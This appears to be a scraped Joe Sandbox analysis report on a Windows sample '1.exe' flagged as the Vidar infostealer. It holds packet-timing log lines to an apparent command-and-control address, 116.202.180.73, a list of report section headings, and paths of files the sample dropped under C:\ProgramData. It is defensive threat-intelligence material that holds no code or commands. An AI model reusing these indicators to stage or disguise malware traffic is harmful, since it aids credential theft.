Feb 19, 2025 20:56:59.672144890 CET	58958	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:59.672346115 CET	58958	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:59.672369957 CET	443	58958	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:59.761171103 CET	443	58957	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:59.761270046 CET	443	58957	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:59.761275053 CET	58957	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:59.761346102 CET	58957	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:59.768279076 CET	58957	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:59.768323898 CET	443	58957	116.202.180.73	192.168.2.4
Feb 19, 2025 20:57:00.322475910 CET	443	58958	116.202.180.73	192.168.2.4
Feb 19, 2025 20:57:00.322629929 CET	58958	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:57:00.323215008 CET	58958	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:57:00.323247910 CET	443	58958	116.202.180.73	192.168.2.4
Feb 19, 2025 20:57:00.325253010 CET	58958	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:57:00.325263977 CET	443	58958	116.202.180.73	192.168.2.4
Feb 19, 2025 20:57:00.325309038 CET	58958	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:57:00.325320959 CET	443	58958	116.202.180.73	192.168.2.4
Feb 19, 2025 20:57:00.710681915 CET	58959	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:57:00.710781097 CET	443	58959	116.202.180.73	192.168.2.4
Feb 19, 2025 20:57:00.710879087 CET	58959	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:57:00.711169958 CET	58959	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:57:00.711206913 CET	443	58959	116.202.180.73	192.168.2.4
Feb 19, 2025 20:57:00.943090916 CET	443	58958	116.202.180.73	192.168.2.4
Feb 19, 2025 20:57:00.943279982 CET	58958	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:57:00.943293095 CET	443	58958	116.202.180.73	192.168.2.4
Feb 19, 2025 20:57:00.943427086 CET	58958	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:57:00.944135904 CET	58958	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:57:00.944179058 CET	443	58958	116.202.180.73	192.168.2.4
Feb 19, 2025 20:57:01.371984959 CET	443	58959	116.202.180.73	192.168.2.4
Feb 19, 2025 20:57:01.375551939 CET	58959	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:57:01.375965118 CET	58959	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:57:01.375994921 CET	443	58959	116.202.180.73	192.168.2.4
Feb 19, 2025 20:57:01.377748013 CET	58959	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:57:01.377760887 CET	443	58959	116.202.180.73	192.168.2.4
Feb 19, 2025 20:57:01.377804041 CET	58959	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:57:01.377815962 CET	443	58959	116.202.180.73	192.168.2.4
Feb 19, 2025 20:57:01.792964935 CET	58961	443	192.168.2.4	116.202.180.73

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\va1vs\1djw4w

C:\ProgramData\va1vs\2v3wba

C:\ProgramData\va1vs\5x47q9

C:\ProgramData\va1vs\6fkfkx

C:\ProgramData\va1vs\7ymgl6

C:\ProgramData\va1vs\8gvk6x

C:\ProgramData\va1vs\9hl6p8

C:\ProgramData\va1vs\aiw4ek

C:\ProgramData\va1vs\gdtjm7

C:\ProgramData\va1vs\gvs0hv

Windows Analysis Report
1.exe